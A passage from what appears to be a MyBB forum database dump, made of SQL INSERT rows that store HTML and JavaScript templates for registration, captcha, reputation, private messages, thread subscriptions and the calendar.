cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->registration}</strong></td>\n</tr>\n<tr>\n<td width=\"50%\" class=\"trow1\" valign=\"top\">\n<fieldset class=\"trow2\">\n<legend><strong>{$lang->account_details}</strong></legend>\n<table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\">\n<tr>\n<td colspan=\"2\"><span class=\"smalltext\"><label for=\"username\">{$lang->username}</label></span></td>\n</tr>\n<tr>\n<td colspan=\"2\"><input type=\"text\" class=\"textbox\" name=\"username\" id=\"username\" style=\"width: 100%\" value=\"{$username}\" /></td>\n</tr>\n{$passboxes}\n<tr>\n<td><span class=\"smalltext\"><label for=\"email\">{$lang->email}</label></span></td>\n<td><span class=\"smalltext\"><label for=\"email2\">{$lang->confirm_email}</label></span></td>\n</tr>\n<tr>\n<td><input type=\"text\" class=\"textbox\" name=\"email\" id=\"email\" style=\"width: 100%\" maxlength=\"50\" value=\"{$email}\" /></td>\n<td><input type=\"text\" class=\"textbox\" name=\"email2\" id=\"email2\" style=\"width: 100%\" maxlength=\"50\" value=\"{$email2}\" /></td>\n</tr>\n<tr>\n <td colspan=\"2\" style=\"display: none;\" id=\"email_status\">&nbsp;</td>\n</tr>\n{$hiddencaptcha}\n</table>\n</fieldset>\n{$requiredfields}\n{$referrer}\n{$regimage}\n</td>\n<td width=\"50%\" class=\"trow1\" valign=\"top\">\n<fieldset class=\"trow2\">\n<legend><strong>{$lang->account_prefs}</strong></legend>\n<table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\">\n<tr>\n<td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"allownotices\" id=\"allownotices\" value=\"1\" {$allownoticescheck} /></td>\n<td valign=\"top\"><span class=\"smalltext\"><label for=\"allownotices\">{$lang->allow_notices}</label></span></td>\n</tr>\n<tr>\n<td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"hideemail\" id=\"hideemail\" value=\"1\" {$hideemailcheck} /></td>\n<td valign=\"top\"><span class=\"smalltext\"><label for=\"hideemail\">{$lang->hide_email}</label></span></td>\n</tr>\n<tr>\n<td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"receivepms\" id=\"receivepms\" value=\"1\" {$receivepmscheck} /></td>\n<td valign=\"top\"><span class=\"smalltext\"><label for=\"receivepms\">{$lang->receive_pms}</label></span></td>\n</tr>\n<tr>\n<td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"pmnotice\" id=\"pmnotice\" value=\"1\"{$pmnoticecheck} /></td>\n<td valign=\"top\"><span class=\"smalltext\"><label for=\"pmnotice\">{$lang->pm_notice}</label></span></td>\n</tr>\n<tr>\n<td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"emailpmnotify\" id=\"emailpmnotify\" value=\"1\" {$emailpmnotifycheck} /></td>\n<td valign=\"top\"><span class=\"smalltext\"><label for=\"emailpmnotify\">{$lang->email_notify_newpm}</label></span></td>\n</tr>\n<tr>\n<td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"invisible\" id=\"invisible\" value=\"1\" {$invisiblecheck} /></td>\n<td valign=\"top\"><span class=\"smalltext\"><label for=\"invisible\">{$lang->invisible_mode}</label></span></td>\n</tr>\n<tr>\n<td colspan=\"2\"><span class=\"smalltext\"><label for=\"subscriptionmethod\">{$lang->subscription_method}</label></span></td>\n</tr>\n<tr>\n<td colspan=\"2\">\n <select name=\"subscriptionmethod\" id=\"subscriptionmethod\">\n <option value=\"0\" {$no_subscribe_selected}>{$lang->no_auto_subscribe}</option>\n <option value=\"1\" {$no_email_subscribe_selected}>{$lang->no_email_subscribe}</option>\n <option value=\"2\" {$instant_email_subscribe_selected}>{$lang->instant_email_subscribe}</option>\n </select>\n</td>\n</tr>\n\n</table>\n</fieldset>\n<br />\n<fieldset class=\"trow2\">\n<legend><strong><label for=\"timezone\">{$lang->time_offset}</label></strong></legend>\n<table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\">\n<tr>\n<td><span class=\"smalltext\">{$lang->time_offset_desc}</span></td>\n</tr>\n<tr>\n<td>{$tzselect}</td>\n</tr>\n<tr>\n<td><span class=\"smalltext\">{$lang->dst_correction}</span></td>\n</tr>\n<tr>\n<td>\n <select name=\"dstcorrection\">\n <option value=\"2\" {$dst_auto_selected}>{$lang->dst_correction_auto}</option>\n <option value=\"1\" {$dst_enabled_selected}>{$lang->dst_correction_enabled}</option>\n <option value=\"0\" {$dst_disabled_selected}>{$lang->dst_correction_disabled}</option>\n </select>\n</td>\n</tr>\n</table>\n</fieldset>\n<br />\n<fieldset class=\"trow2\">\n<legend><strong><label for=\"language\">{$lang->lang_select}</label></strong></legend>\n<table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\">\n<tr>\n<td colspan=\"2\"><span class=\"smalltext\">{$lang->lang_select_desc}</span></td>\n</tr>\n<tr>\n<td><select name=\"language\" id=\"language\"><option value=\"\">{$lang->lang_select_default}</option><option value=\"\">-----------</option>{$langoptions}</select></td>\n</tr>\n</table>\n</fieldset>\n</td>\n</tr>\n</table>\n<br />\n<div align=\"center\">\n<input type=\"hidden\" name=\"step\" value=\"registration\" />\n<input type=\"hidden\" name=\"action\" value=\"do_register\" />\n<input type=\"submit\" class=\"button\" name=\"regsubmit\" value=\"{$lang->submit_registration}\" />\n</div>\n</form>\n<script type=\"text/javascript\">\n<!--\n regValidator = new FormValidator(\'registration_form\');\n regValidator.register(\'username\', \'notEmpty\', {failure_message:\'{$lang->js_validator_no_username}\'});\n regValidator.register(\'email\', \'regexp\', {match_field:\'email2\', regexp:\'^([a-zA-Z0-9_\\\\.\\\\+\\\\-])+\\\\@(([a-zA-Z0-9\\\\-])+\\\\.)+([a-zA-Z0-9]{2,4})+$\', failure_message:\'{$lang->js_validator_invalid_email}\'});\n regValidator.register(\'email2\', \'matches\', {match_field:\'email\', status_field:\'email_status\', failure_message:\'{$lang->js_validator_email_match}\'});\n{$validator_extra}\n regValidator.register(\'username\', \'ajax\', {url:\'xmlhttp.php?action=username_availability\', loading_message:\'{$lang->js_validator_checking_username}\'}); // needs to be last\n// -->\n</script>\n{$footer}\n</body>\n</html>', '-2', '1605', '', '1339729416'); INSERT INTO mybb_templates VALUES('433', 'member_register_hiddencaptcha', '<tr style=\"display: none;\">\n <td colspan=\"2\" id=\"{$captcha_field}_status\">{$lang->leave_this_field_empty} <input type=\"text\" class=\"textbox\" name=\"{$captcha_field}\" id=\"{$captcha_field}\" style=\"width: 100%\" maxlength=\"50\" value=\"\" /></td>\n</tr>', '-2', '1605', '', '1339729416'); INSERT INTO mybb_templates VALUES('434', 'global_bannedwarning', '<div class=\"red_alert\">\n<strong>{$lang->banned_warning}</strong>\n{$lang->banned_warning2}: {$reason}<br />\n{$lang->banned_warning3}: {$banlift}<br />\n</div>\n<br />', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('435', 'htmldoctype', '<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('436', 'postbit_multiquote', '<a href=\"javascript:Thread.multiQuote({$post[\'pid\']});\" style=\"display: none;\" id=\"multiquote_link_{$post[\'pid\']}\"><img src=\"{$theme[\'imglangdir\']}/postbit_multiquote.gif\" alt=\"{$lang->postbit_multiquote}\" title=\"{$lang->postbit_multiquote}\" id=\"multiquote_{$post[\'pid\']}\" /></a>\n<script type=\"text/javascript\">\n//<!--\n $(\'multiquote_link_{$post[\'pid\']}\').style.display = \'\';\n// -->\n</script>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('437', 'private_send_autocomplete', '<script type=\"text/javascript\" src=\"jscripts/autocomplete.js?ver=1400\"></script>\n<script type=\"text/javascript\">\n<!--\n if(use_xmlhttprequest == \"1\")\n {\n new autoComplete(\"to\", \"xmlhttp.php?action=get_users\", {valueSpan: \"username\", delimChar: \",\"});\n if($(\'bcc\'))\n {\n new autoComplete(\"bcc\", \"xmlhttp.php?action=get_users\", {valueSpan: \"username\", delimChar: \",\"});\n }\n }\n// -->\n</script>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('438', 'forumdisplay_threadlist_inlineedit_js', '<script type=\"text/javascript\" src=\"jscripts/inline_edit.js?ver=1400\"></script>\n<script type=\"text/javascript\">\n<!--\n if(use_xmlhttprequest == \"1\")\n {\n new inlineEditor(\"xmlhttp.php?action=edit_subject&my_post_key=\"+my_post_key, {className: \"subject_editable\", spinnerImage: \"{$theme[\'imgdir\']}/spinner.gif\", lang_click_edit: \"{$lang->click_hold_edit}\"});\n }\n// -->\n</script>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('439', 'xmlhttp_inline_post_editor', '<br />\n <div style=\"clear: both;\">\n <div>\n <textarea style=\"width: 99%; padding: 4px; margin: 0;\" rows=\"12\" cols=\"80\" id=\"quickedit_{$post[\'pid\']}\" tabindex=\"999\">{$post[\'message\']}</textarea>\n </div>\n <div class=\"editor_control_bar\" style=\"width: 99%; padding: 4px; margin-top: 3px; text-align: right;\">\n <input type=\"button\" class=\"button\" onclick=\"Thread.quickEditSave({$post[\'pid\']});\" value=\"{$lang->save_changes}\" tabindex=\"1000\" />\n <input type=\"button\" class=\"button\" onclick=\"Thread.quickEditCancel({$post[\'pid\']});\" value=\"{$lang->cancel_edit}\" tabindex=\"1001\" />\n </div>\n <br style=\"clear: both;\" />\n </div>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('440', 'reputation_vote', '<tr>\n <td class=\"trow1 {$status_class}\">\n {$reputation_vote[\'username\']} <span class=\"smalltext\">{$reputation_vote[\'user_reputation\']} - {$last_updated} {$delete_link}<br />{$postrep_given}<br /></span>\n <strong class=\"{$vote_type_class}\">{$vote_type} {$vote_reputation}:</strong> {$reputation_vote[\'comments\']}\n </td>\n</tr>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('441', 'reputation_addlink', '<div class=\"float_right\" style=\"padding-bottom: 4px;\"><a href=\"javascript:MyBB.reputation({$user[\'uid\']});\"><img src=\"{$theme[\'imglangdir\']}/rateuser.gif\" alt=\"{$lang->rate_user}\" title=\"{$lang->rate_user}\" /></a></div>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('442', 'member_profile_reputation', '<tr>\n <td class=\"{$bg_color}\"><strong>{$lang->reputation}</strong></td>\n <td class=\"{$bg_color}\">{$reputation} [<a href=\"reputation.php?uid={$memprofile[\'uid\']}\">{$lang->reputation_details}</a>] {$vote_link}</td>\n</tr>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('443', 'reputation_no_votes', '<tr>\n <td class=\"trow1\" style=\"text-align: center;\">{$lang->no_reputation_votes}</td>\n</tr>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('444', 'reputation_add_error', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->reputation}</title>\n{$headerinclude}\n</head>\n<body>\n<br />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td class=\"trow1\" style=\"padding: 20px\">\n <strong>{$lang->error}</strong><br /><br />\n <blockquote>{$message}</blockquote>\n <br /><br />\n <div style=\"text-align: center;\">\n <script type=\"text/javascript\">\n <!--\n var showBack = {$show_back};\n if(showBack == 1)\n {\n document.write(\'[<a href=\"javascript:history.go(-1);\">{$lang->go_back}</a>]\');\n }\n document.write(\'[<a href=\"javascript:window.close();\">{$lang->close_window}</a>]\');\n // -->\n </script>\n </div>\n </td>\n </tr>\n</table>\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('445', 'reputation_added', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->reputation}</title>\n{$headerinclude}\n</head>\n<body onunload=\"window.opener.location.reload();\">\n<br />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td class=\"trow1\" style=\"padding: 20px\">\n <strong>{$lang->vote_added}</strong><br /><br />\n <blockquote>{$lang->vote_added_message}</blockquote>\n <br /><br />\n <div style=\"text-align: center;\">\n <script type=\"text/javascript\">\n <!--\n document.write(\'[<a href=\"javascript:window.close();\">{$lang->close_window}</a>]\');\n // -->\n </script>\n </div>\n </td>\n </tr>\n</table>\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('446', 'reputation_deleted', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->reputation}</title>\n{$headerinclude}\n</head>\n<body onunload=\"window.opener.location.reload();\">\n<br />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td class=\"trow1\" style=\"padding: 20px\">\n <strong>{$lang->vote_deleted}</strong><br /><br />\n <blockquote>{$lang->vote_deleted_message}</blockquote>\n <br /><br />\n <div style=\"text-align: center;\">\n <script type=\"text/javascript\">\n <!--\n document.write(\'[<a href=\"javascript:window.close();\">{$lang->close_window}</a>]\');\n // -->\n </script>\n </div>\n </td>\n </tr>\n</table>\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('447', 'forumdisplay_thread_attachment_count', '<div style=\"float: right;\"><img src=\"{$theme[\'imgdir\']}/paperclip.gif\" alt=\"\" title=\"{$attachment_count}\" /></div>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('448', 'forumdisplay_rssdiscovery', '<link rel=\"alternate\" type=\"application/rss+xml\" title=\"{$lang->rss_discovery_forum} (RSS 2.0)\" href=\"{$mybb->settings[\'bburl\']}/syndication.php?fid={$fid}\" />\n<link rel=\"alternate\" type=\"application/atom+xml\" title=\"{$lang->rss_discovery_forum} (Atom 1.0)\" href=\"{$mybb->settings[\'bburl\']}/syndication.php?type=atom1.0&amp;fid={$fid}\" />', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('449', 'post_captcha', '<tr id=\"captcha_trow\">\n<td class=\"trow1\" valign=\"top\"><strong>{$lang->image_verification}</strong></td>\n<td class=\"trow1\">\n<script type=\"text/javascript\" src=\"jscripts/captcha.js?ver=1400\"></script>\n<table style=\"width: 300px; padding: 4px;\">\n <tr>\n <td rowspan=\"2\" style=\"vertical-align: middle;\"><img src=\"captcha.php?imagehash={$imagehash}\" alt=\"{$lang->image_verification}\" title=\"{$lang->image_verification}\" id=\"captcha_img\" /><br /><span style=\"color: red;\" class=\"smalltext\">{$lang->verification_subnote}</span>\n <script type=\"text/javascript\">\n <!--\n if(use_xmlhttprequest == \"1\")\n {\n document.write(\'<br \\/><br \\/><input type=\"button\" class=\"button\" name=\"refresh\" value=\"{$lang->refresh}\" onclick=\"return captcha.refresh();\" \\/>\');\n }\n // -->\n </script>\n </td>\n <td><span class=\"smalltext\">{$lang->verification_note}</span></td>\n </tr>\n <tr>\n <td><input type=\"text\" class=\"textbox\" name=\"imagestring\" value=\"\" id=\"imagestring\" /><input type=\"hidden\" name=\"imagehash\" value=\"{$imagehash}\" id=\"imagehash\" /></td>\n </tr>\n</table>\n</td>\n</tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('450', 'post_captcha_recaptcha', '<tr id=\"captcha_trow\">\n<td class=\"trow1\" valign=\"top\"><strong>{$lang->image_verification}</strong></td>\n<td class=\"trow1\">\n<script type=\"text/javascript\">\n<!--\n var RecaptchaOptions = {\n theme: \'clean\'\n };\n// -->\n</script>\n<table style=\"width: 300px; padding: 4px;\">\n <tr>\n <td><span class=\"smalltext\">{$lang->verification_note}</span></td>\n </tr>\n <tr>\n <td><script type=\"text/javascript\" src=\"{$server}/challenge?k={$public_key}\"></script></td>\n </tr>\n</table>\n</td>\n</tr>', '-2', '1605', '', '1339729416'); INSERT INTO mybb_templates VALUES('451', 'post_captcha_hidden', '<input type=\"hidden\" name=\"{$hash}\" value=\"{$field[\'hash\']}\" />\n<input type=\"hidden\" name=\"{$string}\" value=\"{$field[\'string\']}\" />', '-2', '1605', '', '1339729416'); INSERT INTO mybb_templates VALUES('452', 'newreply_multiquote_external', '<div id=\"multiquote_unloaded\"><span class=\"smalltext\">{$multiquote_text} <a href=\"./newreply.php?tid={$tid}\" onclick=\"return Post.loadMultiQuoted();\">{$multiquote_quote}</a>, <a href=\"javascript:Post.clearMultiQuoted();\">{$multiquote_deselect}</a></span></div>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('453', 'newthread_multiquote_external', '<div id=\"multiquote_unloaded\"><span class=\"smalltext\">{$multiquote_text} <a href=\"./newthread.php?fid={$fid}&amp;load_all_quotes=1\" onclick=\"return Post.loadMultiQuotedAll();\">{$multiquote_quote}</a>, <a href=\"javascript:Post.clearMultiQuoted();\">{$multiquote_deselect}</a></span></div>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('454', 'postbit_author_user', '\n {$lang->postbit_posts} {$post[\'postnum\']}<br />\n {$lang->postbit_joined} {$post[\'userregdate\']}\n {$post[\'replink\']}{$post[\'warninglevel\']}', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('455', 'postbit_author_guest', '&nbsp;', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('456', 'php_warnings', '<table border=\"0\" cellspacing=\"1\" cellpadding=\"4\" align=\"center\" class=\"tborder\">\n<tr>\n<td class=\"tcat\">\n<strong>{$lang->warnings}</strong>\n</td>\n</tr>\n<tr>\n<td class=\"trow1\"><span class=\"smalltext\">{$this->warnings}</span><br /></td>\n</tr>\n</table><br /><br />', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('457', 'postbit_delete_pm', '<a href=\"private.php?action=delete&amp;pmid={$id}&amp;my_post_key={$mybb->post_code}\"><img src=\"{$theme[\'imglangdir\']}/pm_delete.gif\" alt=\"{$lang->delete}\" title=\"{$lang->delete_title}\" /></a>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('458', 'postbit_forward_pm', '<a href=\"private.php?action=send&amp;pmid={$id}&amp;do=forward\"><img src=\"{$theme[\'imglangdir\']}/pm_forward.gif\" alt=\"{$lang->forward}\" title=\"{$lang->forward_title}\" /></a>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('459', 'postbit_reply_pm', '<a href=\"private.php?action=send&amp;pmid={$id}&amp;do=reply\"><img src=\"{$theme[\'imglangdir\']}/pm_reply.gif\" alt=\"{$lang->reply}\" title=\"{$lang->reply_title}\" /></a>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('460', 'postbit_replyall_pm', '<a href=\"private.php?action=send&amp;pmid={$id}&amp;do=replyall\"><img src=\"{$theme[\'imglangdir\']}/postbit_replyall.gif\" alt=\"{$lang->reply_to_all}\" title=\"{$lang->reply_title}\" /></a>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('461', 'showthread_search', ' <div class=\"float_right\">\n <form action=\"search.php\" method=\"post\">\n <input type=\"hidden\" name=\"action\" value=\"thread\" />\n <input type=\"hidden\" name=\"tid\" value=\"{$thread[\'tid\']}\" />\n <input type=\"text\" name=\"keywords\" value=\"{$lang->enter_keywords}\" onfocus=\"if(this.value == \'{$lang->enter_keywords}\') { this.value = \'\'; }\" onblur=\"if(this.value==\'\') { this.value=\'{$lang->enter_keywords}\'; }\" class=\"textbox\" size=\"25\" />\n <input type=\"submit\" class=\"button\" value=\"{$lang->search_thread}\" />\n </form>\n </div>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('462', 'postbit_ignored', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"{$post_extra_style}\" id=\"ignored_post_{$post[\'pid\']}\">\n<tr>\n <td class=\"{$altbg}\" width=\"15%\" valign=\"top\" style=\"white-space: nowrap; text-align: center;\">\n <strong><span class=\"largetext\">{$post[\'profilelink\']}</span></strong>\n </td>\n <td class=\"{$altbg}\" width=\"85%\" style=\"vertical-align: middle;\">\n <div style=\"float: right; width: auto; vertical-align: top; display: none;\" id=\"show_ignored_link_{$post[\'pid\']}\"><span class=\"smalltext\"><a href=\"#\" onclick=\"Thread.showIgnoredPost({$post[\'pid\']}); return false;\">{$lang->postbit_show_ignored_post}</a></span></div>\n<script type=\"text/javascript\">\n<!--\n $(\'show_ignored_link_{$post[\'pid\']}\').show();\n// -->\n</script>\n <span class=\"smalltext\">{$ignored_message}</span>\n </td>\n</tr>\n</table>', '-2', '1410', '', '1339729416'); INSERT INTO mybb_templates VALUES('463', 'footer_languageselect', '<form method=\"{$lang_redirect_url[\'form_method\']}\" action=\"{$lang_redirect_url[\'location\']}\" id=\"lang_select\">\n {$lang_redirect_url[\'form_html\']}\n <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n <select name=\"language\" onchange=\"MyBB.changeLanguage();\">\n <optgroup label=\"{$lang->select_language}\">\n {$lang_options}\n </optgroup>\n </select>\n {$gobutton}\n </form>', '-2', '1605', '', '1339729416'); INSERT INTO mybb_templates VALUES('464', 'usercp_addsubscription_thread', '<html>\n<head>\n<title>{$lang->subscribe_to_thread}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<form action=\"usercp2.php\" method=\"post\" name=\"input\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<input type=\"hidden\" name=\"action\" value=\"do_addsubscription\" />\n<input type=\"hidden\" name=\"tid\" value=\"{$thread[\'tid\']}\" />\n<table width=\"100%\" border=\"0\" align=\"center\">\n<tr>\n{$usercpnav}\n<td valign=\"top\">\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->subscribe_to_thread}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\" valign=\"top\" width=\"200\"><strong>{$lang->notification_method}</strong></td>\n<td class=\"trow1\" valign=\"top\">\n <table width=\"100%\" border=\"0\" align=\"center\">\n <tr>\n <td width=\"1\"><input type=\"radio\" name=\"notification\" id=\"notification_none\" value=\"0\" {$notification_none_checked} /></td>\n <td><strong><label for=\"notification_none\">{$lang->no_notification}</label></strong><br /><span class=\"smalltext\">{$lang->no_notification_desc}</span></td>\n </tr>\n <tr>\n <td width=\"1\"><input type=\"radio\" name=\"notification\" id=\"notification_instant\" value=\"1\" {$notification_instant_checked} /></td>\n <td><strong><label for=\"notification_instant\">{$lang->instant_notification}</label></strong><br /><span class=\"smalltext\">{$lang->instant_notification_desc}</span></td>\n </tr>\n </table>\n</td>\n</tr>\n</table>\n<br />\n<div style=\"text-align: center;\">\n <input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->do_subscribe}\" tabindex=\"3\" accesskey=\"s\" />\n</div>\n</td>\n</tr>\n</table>\n</form>\n{$footer}\n</body>\n</html>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('465', 'post_subscription_method', '<tr>\n<td class=\"{$bgcolor}\" valign=\"top\">{$lang->thread_subscription_method}</td>\n<td class=\"{$bgcolor} smalltext\">\n <label><input type=\"radio\" name=\"postoptions[subscriptionmethod]\" {$postoptions_subscriptionmethod_dont} value=\"\" style=\"vertical-align: middle;\" /> {$lang->no_subscribe}</label><br />\n <label><input type=\"radio\" name=\"postoptions[subscriptionmethod]\" {$postoptions_subscriptionmethod_none} value=\"none\" style=\"vertical-align: middle;\" /> {$lang->no_email_subscribe}</label><br />\n <label><input type=\"radio\" name=\"postoptions[subscriptionmethod]\" {$postoptions_subscriptionmethod_instant} value=\"instant\" style=\"vertical-align: middle;\" /> {$lang->instant_email_subscribe}</label><br />\n</td>\n</tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('466', 'index_boardstats', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<thead>\n<tr>\n<td class=\"thead\">\n<div class=\"expcolimage\"><img src=\"{$theme[\'imgdir\']}/collapse{$collapsedimg[\'boardstats\']}.gif\" id=\"boardstats_img\" class=\"expander\" alt=\"[-]\" title=\"[-]\" /></div>\n<div><strong>{$lang->boardstats}</strong></div>\n</td>\n</tr>\n</thead>\n<tbody style=\"{$collapsed[\'boardstats_e\']}\" id=\"boardstats_e\">\n{$whosonline}\n{$birthdays}\n{$forumstats}\n<tr>\n <td class=\"tfoot\" style=\"text-align: right\">\n <span class=\"smalltext\">\n {$logoutlink}\n <a href=\"misc.php?action=markread{$post_code_string}\">{$lang->markread}</a> |\n <a href=\"showteam.php\">{$lang->forumteam}</a> |\n <a href=\"stats.php\">{$lang->forumstats}</a>\n </span>\n </td>\n</tr>\n</tbody>\n</table>\n<br />', '-2', '1603', '', '1339729416'); INSERT INTO mybb_templates VALUES('467', 'calendar', '<html>\n<head>\n <title>{$mybb->settings[\'bbname\']} - {$lang->calendar}</title>\n {$headerinclude}\n</head>\n<body>\n {$header}\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <thead>\n <tr>\n <td class=\"thead\" colspan=\"8\">\n <div class=\"float_right\">\n <a href=\"{$prev_link}\">&laquo; {$prev_month[\'name\']} {$prev_month[\'year\']}</a> | <a href=\"{$next_link}\">{$next_month[\'name\']} {$next_month[\'year\']} &raquo;</a>\n </div>\n <div><strong>{$monthnames[$month]} {$year}</strong></div>\n </td>\n </tr>\n <tr>\n <td class=\"tcat\">&nbsp;</td>\n {$weekday_headers}\n </tr>\n </thead>\n <tbody>\n {$calendar_rows}\n </tbody>\n </table>\n<br />\n<form action=\"calendar.php\" method=\"post\">\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td class=\"trow1\">\n <table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n <tr>\n <td class=\"trow1\" valign=\"top\">{$addevent}</td>\n <td class=\"trow1\" align=\"right\">\n <span class=\"smalltext\"><strong>{$lang->jump_month}</strong></span>\n <select name=\"month\">\n <option value=\"{$month}\">{$monthnames[$month]}</option>\n <option value=\"{$month}\">----------</option>\n <option value=\"1\">{$lang->alt_month_1}</option>\n <option value=\"2\">{$lang->alt_month_2}</option>\n <option value=\"3\">{$lang->alt_month_3}</option>\n <option value=\"4\">{$lang->alt_month_4}</option>\n <option value=\"5\">{$lang->alt_month_5}</option>\n <option value=\"6\">{$lang->alt_month_6}</option>\n <option value=\"7\">{$lang->alt_month_7}</option>\n <option value=\"8\">{$lang->alt_month_8}</option>\n <option value=\"9\">{$lang->alt_month_9}</option>\n <option value=\"10\">{$lang->alt_month_10}</option>\n <option value=\"11\">{$lang->alt_month_11}</option>\n <option value=\"12\">{$lang->alt_month_12}</option>\n </select>\n <select name=\"year\">\n <option value=\"{$year}\">{$year}</option>\n <option value=\"{$year}\">----------</option>\n {$yearsel}\n </select>\n {$gobutton}\n <br /><br />\n <span class=\"smalltext\"><strong>{$lang->jump_to_calendar}</strong></span>\n {$calendar_jump}\n {$gobutton}\n </td>\n </tr>\n </table>\n </td>\n </tr>\n </table>\n </form>\n{$footer}\n</body>\n</html>', '-2', '1603', '', '1339729416'); INSERT INTO mybb_templates VALUES('468', 'calendar_weekdayheader', ' <td class=\"tcat\" align=\"center\" width=\"14%\"><strong>{$weekday_name}</strong></td>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('469', 'calendar_weekrow', ' <tr>\n <td class=\"tcat\" align=\"center\" width=\"1\"><a href=\"{$week_link}\">&raquo;</a></td>\n {$day_bits}\n </tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('470', 'calendar_weekrow_day_today', ' <td class=\"calendar_daybit_today\">\n <div class=\"float_right smalltext\"><a href=\"{$day_link}\">{$day}</a></div>\n <div>\n {$day_events}\n {$day_birthdays}\n </div>\n </td>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('471', 'calendar_weekrow_day', ' <td class=\"{$day_class}\" height=\"100\" valign=\"top\">\n <div class=\"float_right smalltext\"><a href=\"{$day_link}\">{$day}</a></div>\n <div style=\"clear: both;\">\n {$day_birthdays}\n {$day_events}\n </div>\n </td>\n', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('472', 'calendar_weekrow_day_external', ' <td class=\"calendar_daybit_external\">\n <div class=\"float_right smalltext\"><a href=\"{$day_link}\">{$day}</a></div>\n <div>\n {$day_events}\n {$day_birthdays}\n </div>\n </td>\n', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('473', 'calendar_addevent', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->calendar} - {$lang->add_event}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n{$event_errors}\n<form action=\"calendar.php\" method=\"post\" name=\"input\">\n <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n <table border=\"0\" 